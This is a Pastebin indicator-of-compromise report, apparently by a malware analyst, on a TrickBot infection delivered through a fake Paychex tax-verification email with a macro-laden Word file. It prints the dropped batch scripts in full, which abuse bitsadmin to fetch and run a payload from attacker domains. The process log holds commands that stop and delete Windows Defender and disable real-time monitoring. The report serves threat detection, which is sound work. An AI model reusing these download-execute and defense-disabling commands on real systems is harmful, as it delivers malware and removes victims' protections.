Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #trickbot #W97M #AutoClose #BAT #BITS
- https://pastebin.com/Vt02288z
- previous contact:
- 06/02/19 https://pastebin.com/70KhU3a4
- 05/10/18 https://pastebin.com/75KNqwCf
- 02/10/18 https://pastebin.com/fm5Ug69G
- 24/09/18 https://pastebin.com/LjuNyGfn
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_trickbot_051018/
- https://myonlinesecurity.co.uk/fake-paychex-tax-verification-documents-delivers-trickbot/
- https://github.com/DidierStevens/DidierStevensSuite/blob/master/vba.yara
- attack_vector
- --------------
- email attach .doc > macro_AutoClose > 4 bat > BITS > GET > AppData\Roaming\wnetwork\*.exe
- email_headers
- --------------
- Received: from paychex.email ([95.211.163.2])
- Received: by paychex.email for <user00@org88.victim0.com>;
- (envelope-from <J.Clark-user00=org88.victim0.com@paychex.email>)
- Subject: RE: Tax verification documents
- From: "Jeff Clark - Paychex" <J.Clark@paychex.email>
- Date: Thu, 7 Mar 2019 14:33:37 -0500
- To: user00@org88.victim0.com
- files
- --------------
- SHA-256 a2ee9205643518f97d02ba0a70105a920c316b599755439b03f20433eecff625
- File name Verification_Documents.doc [Composite Document File V2 Document, Little Endian]
- File size 100.5 KB
- SHA-256 da252efc670493820e953a0472959d21ca2dd85b2d4ed25b693d1ced25a02fbd
- File name za.ebali [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 245 KB
- activity
- **************
- Yahhop1.bat
- --------------
- cmd /r cmd /c copy /Y /V %windir%\system32\bitsadmin.exe %temp%\@n10FGA.exe && %temp%\Yahhop2.bat && %temp%\Yahhop3.bat && %temp%\Yahhop4.bat
- Yahhop2.bat
- --------------
- cmd /r cmd /c ping -n 2 yasgold{.} com
- if %errorlevel%==0 (set slomw=yasgold{.} com) else (set slomw=mitreart{.} com)
- Yahhop3.bat
- --------------
- cmd /r cmd /c %temp%\@n10FGA /reset && %temp%\@n10FGA /CREATE /DOWNLOAD Taur && %temp%\@n10FGA /setNoProgressTimeout Taur 300 && %temp%\@n10FGA /setMinRetryDelay Taur 7 && %temp%\@n10FGA /ADDFILE Taur http://%slomw%/za.ebali %temp%\ebali.exe && %temp%\@n10FGA /SetSecurityFlags Taur 30 && %temp%\@n10FGA /SETMAXDOWNLOADTIME Taur 500 && %temp%\@n10FGA /SetPeerCachingFlags Taur 3 && %temp%\@n10FGA /RESUME Taur && timeout /t 147 /nobreak && %temp%\@n10FGA /COMPLETE Taur
- Yahhop4.bat
- --------------
- cmd /r cmd /c timeout /t 5 /nobreak && %temp%\ebali.exe && del /f /q %temp%\Yahhop1.bat %temp%\Yahhop2.bat %temp%\Yahhop3.bat %temp%\Yahhop4.bat %temp%\Yahhop5.bat %temp%\@n10FGA.exe
- @
- PL_SRC: http://yasgold{.} com/za.ebali
- http://mitreart{.} com/za.ebali
- netwrk
- --------------
- http
- 185.56.145.142 yasgold{.} com HEAD /za.ebali HTTP/1.1 Microsoft BITS/7.5
- 116.203.16.95 ip.anysrc.net GET /plain HTTP/1.1 Mozilla/5.0
- 67.27.235.254 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1 Microsoft-CryptoAPI/6.1
- ssl
- 185.174.174.15
- 82.146.57.38
- 195.123.246.121
- comp
- --------------
- svchost.exe 872 TCP localhost 49376 185.56.145.142 80 ESTABLISHED
- svchost.exe 1688 TCP localhost 49377 116.203.16.95 80 ESTABLISHED
- svchost.exe 1688 TCP localhost 49378 177.107.51.162 449 SYN_SENT
- svchost.exe 1688 TCP localhost 49381 138.204.132.88 449 SYN_SENT
- svchost.exe 1688 TCP localhost 49385 67.27.235.254 80 ESTABLISHED
- svchost.exe 1688 TCP localhost 49384 185.174.174.15 443 ESTABLISHED
- svchost.exe 1688 TCP localhost 49386 82.146.57.38 443 ESTABLISHED
- svchost.exe 1688 TCP localhost 49389 195.123.246.121 443 ESTABLISHED
- proc
- --------------
- 1st
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- C:\Windows\SysWOW64\cmd.exe cmd /r cmd /c copy /Y /V %windir%\system32\bitsadmin.exe %temp%\00JO0!l.exe && %temp%\Yahhop2.bat && %temp%\Yahhop3.bat && %temp%\Yahhop4.bat
- C:\Windows\SysWOW64\cmd.exe /c copy /Y /V C:\Windows\system32\bitsadmin.exe C:\tmp\00JO0!l.exe
- C:\Windows\SysWOW64\cmd.exe /r cmd /c ping -n 2 yasgold{.} com
- C:\Windows\SysWOW64\cmd.exe /c ping -n 2 yasgold{.} com
- C:\Windows\SysWOW64\PING.EXE -n 2 yasgold{.} com
- C:\Windows\SysWOW64\cmd.exe /r cmd /c C:\tmp\00JO0!l /reset
- C:\Windows\SysWOW64\cmd.exe /c C:\tmp\00JO0!l /reset
- C:\tmp\00JO0!l /reset
- C:\tmp\00JO0!l /CREATE /DOWNLOAD Taur
- C:\tmp\00JO0!l /setNoProgressTimeout Taur 300
- C:\tmp\00JO0!l /setMinRetryDelay Taur 7
- C:\tmp\00JO0!l /ADDFILE Taur http://yasgold{.} com/za.ebali C:\tmp\ebali.exe
- C:\tmp\00JO0!l /SetSecurityFlags Taur 30
- C:\tmp\00JO0!l /SETMAXDOWNLOADTIME Taur 500
- C:\tmp\00JO0!l /SetPeerCachingFlags Taur 3
- C:\tmp\00JO0!l /RESUME Taur
- C:\Windows\SysWOW64\timeout.exe timeout /t 147 /nobreak
- C:\tmp\00JO0!l /COMPLETE Taur
- C:\Windows\SysWOW64\cmd.exe /r cmd /c timeout /t 5 /nobreak
- C:\tmp\ebali.exe
- C:\Windows\system32\cmd.exe /c sc stop WinDefend
- C:\Windows\system32\cmd.exe /c sc delete WinDefend
- C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
- C:\Windows\system32\cmd.exe /c sc stop WinDefend
- C:\Windows\system32\cmd.exe /c sc delete WinDefend
- C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- C:\Windows\system32\svchost.exe
- 2nd
- C:\Windows\system32\svchost.exe -k netsvcs
- C:\Windows\system32\taskeng.exe {4A5E0F1F-7A3C-4339-A10A-8292EA54F4A0} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
- C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
- C:\Windows\system32\cmd.exe /c sc stop WinDefend
- C:\Windows\system32\cmd.exe /c sc delete WinDefend
- C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- C:\Windows\system32\svchost.exe
- persist
- --------------
- \Windows Network
- c:\users\operator\appdata\roaming\wnetwork\ebamj.exe 07.03.2019 18:12
- drop
- --------------
- C:\tmp\VBE\MSForms.exd
- C:\tmp\Yahhop1.bat [removed]
- C:\tmp\Yahhop2.bat [removed]
- C:\tmp\Yahhop3.bat [removed]
- C:\tmp\Yahhop4.bat [removed]
- C:\tmp\00JO0!l.exe [removed]
- C:\tmp\BIT7B59.tmp [removed]
- C:\tmp\ebali.exe
- C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
- C:\Users\operator\AppData\Roaming\wnetwork\Greenshot.ini
- C:\Users\operator\AppData\Roaming\wnetwork\Data
- # # #
- https://www.virustotal.com/#/file/a2ee9205643518f97d02ba0a70105a920c316b599755439b03f20433eecff625/details
- https://www.virustotal.com/#/file/da252efc670493820e953a0472959d21ca2dd85b2d4ed25b693d1ced25a02fbd/details
- https://analyze.intezer.com/#/analyses/b11279cb-4c9a-4e59-8605-e6a96c078034
- VR
- @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement